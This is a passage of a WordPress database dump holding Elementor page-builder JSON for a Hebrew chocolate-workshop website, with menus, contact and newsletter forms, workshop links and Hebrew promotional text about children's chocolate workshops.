settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\",\"menu\":\"%d7%a8%d7%90%d7%a9%d7%99\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"e0d5494\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"97fc875\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9efbb93\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"31e0ebc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"\\u05d8\\u05d5\\u05e4\\u05e1 \\u05e6\\u05d3\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34779&lm_key=ec25004589054b7cb52f27a1c66716ff\",\"webhooks_advanced_data\":\"\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"34056794\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"79ba6502\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c9740a4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"62d9ea7a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"2a4010bc\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"527df496\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%9E%D7%A1%D7%99%D7%91%D7%AA-%D7%A8%D7%95%D7%95%D7%A7%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"8c21433\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%97%D7%91%D7%A8%D7%95%D7%AA\\/\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"227b633f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"73e3f56a\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4a1d5ee3\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"28ab3e99\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"7b6d813b\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"702cf53c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"718f913c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"column_gap\":{\"unit\":\"px\",\"size\":0},\"row_gap\":{\"unit\":\"px\",\"size\":0},\"label_color\":\"#ffffff\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":12},\"field_text_color\":\"#000000\",\"field_typography_typography\":\"custom\",\"field_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"field_typography_font_weight\":\"300\",\"field_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"field_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_color\":\"#edd0a8\",\"button_text_color\":\"#ffffff\",\"button_typography_typography\":\"custom\",\"button_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"button_typography_font_weight\":\"600\",\"button_typography_text_transform\":\"uppercase\",\"button_border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"button_background_hover_color\":\"#ed8a00\",\"button_hover_color\":\"#ffffff\",\"input_size\":\"md\",\"button_size\":\"md\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\\"\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false}]'),(1545,320,'_elementor_version','0.4'),(1546,320,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(1554,322,'_wp_page_template','elementor_header_footer'),(1555,322,'_elementor_edit_mode','builder'),(1556,322,'_elementor_data','[{\"id\":\"4097a5fb\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"144a579e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bd8148d\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"45e6d3a2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"409d660c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"1e9c8239\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"62e2de7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/kids-choclate.jpg\",\"id\":125},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6b4fe8e6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d0\\u05ea \\u05d4\\u05d9\\u05dc\\u05d3 \\u05e9\\u05dc\\u05db\\u05dd \\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05db\\u05dc \\u05de\\u05d4 \\u05e9\\u05d4\\u05d5\\u05d0 \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05e7\\u05d5\\u05e8\\u05d9\\u05ea \\u05d5\\u05d4\\u05de\\u05d9\\u05d5\\u05d7\\u05d3\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8? \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05e9\\u05db\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d5\\u05d9\\u05e6\\u05e8\\u05d5 \\u05d1\\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e2\\u05d1\\u05d5\\u05e8\\u05dd \\u05dc\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd? \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd? \\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1? \\u05e8\\u05e7 \\u05ea\\u05d2\\u05d9\\u05d3\\u05d5 \\u05d5\\u05d4\\u05dd \\u05d9\\u05e7\\u05d1\\u05dc\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05de\\u05dc\\u05d0\\u05d4 \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05d4\\u05d9\\u05d9\\u05ea\\u05d4 \\u05dc\\u05d4\\u05dd \\u05d0\\u05d9 \\u05e4\\u05e2\\u05dd \\u05d1\\u05d7\\u05d9\\u05d9\\u05d4\\u05dd \\u05d4\\u05e7\\u05d8\\u05e0\\u05d9\\u05dd \\u05dc\\u05d3\\u05d1\\u05e8 \\u05e9\\u05d4\\u05dd \\u05d4\\u05db\\u05d9 \\u05d0\\u05d5\\u05d4\\u05d1\\u05d9\\u05dd - \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3!<\\/p><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d4 \\u05de\\u05d0\\u05d6 \\u05d5\\u05de\\u05ea\\u05de\\u05d9\\u05d3 \\u05d4\\u05d9\\u05d4 \\u05d4\\u05de\\u05d0\\u05db\\u05dc \\u05e9\\u05e7\\u05d9\\u05e8\\u05d1 \\u05d1\\u05d9\\u05df \\u05d4\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd \\u05d5\\u05d4\\u05dd \\u05ea\\u05de\\u05d9\\u05d3 \\u05d9\\u05d4\\u05d9\\u05d5 \\u05e7\\u05e9\\u05d5\\u05d1\\u05d9\\u05dd \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05ea\\u05e6\\u05d9\\u05e2\\u05d5 \\u05dc\\u05d4\\u05dd \\u05d0\\u05ea \\u05d4\\u05e9\\u05e0\\u05d9\\u05e6\\u05dc \\u05e9\\u05d4\\u05d9\\u05d4 \\u05d1\\u05de\\u05d8\\u05d1\\u05d7 \\u05db\\u05dc \\u05d4\\u05d9\\u05d5\\u05dd. \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5 \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05e9\\u05dc \\u05db\\u05d5\\u05dc\\u05e0\\u05d5, \\u05dc\\u05d0 \\u05e8\\u05e7 \\u05e9\\u05dc \\u05d4\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd, \\u05d0\\u05dc \\u05ea\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d7\\u05d5\\u05d5\\u05d9\\u05d4 \\u05d4\\u05d6\\u05d5 \\u05e8\\u05d9\\u05e7\\u05d4 \\u05de\\u05de\\u05d1\\u05d5\\u05d2\\u05e8\\u05d9\\u05dd \\u05db\\u05d9 \\u05d2\\u05dd \\u05d0\\u05ea\\u05dd \\u05ea\\u05d9\\u05d4\\u05e0\\u05d5 \\u05d1\\u05e8\\u05de\\u05d5\\u05ea \\u05d4\\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3, \\u05d5\\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05db\\u05e9\\u05de\\u05d3\\u05d5\\u05d1\\u05e8 \\u05d1\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7\\u05d9\\u05dd \\u05d5\\u05d1\\u05de\\u05ea\\u05d5\\u05e7\\u05d9\\u05dd. \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d0\\u05ea \\u05e2\\u05e6\\u05de\\u05db\\u05dd, \\u05dc\\u05d0 \\u05de\\u05e2\\u05d8 \\u05d4\\u05d5\\u05e8\\u05d9\\u05dd \\u05de\\u05e2\\u05d9\\u05d3\\u05d9\\u05dd \\u05e2\\u05dc \\u05db\\u05da \\u05e9\\u05e0\\u05d4\\u05e0\\u05d5 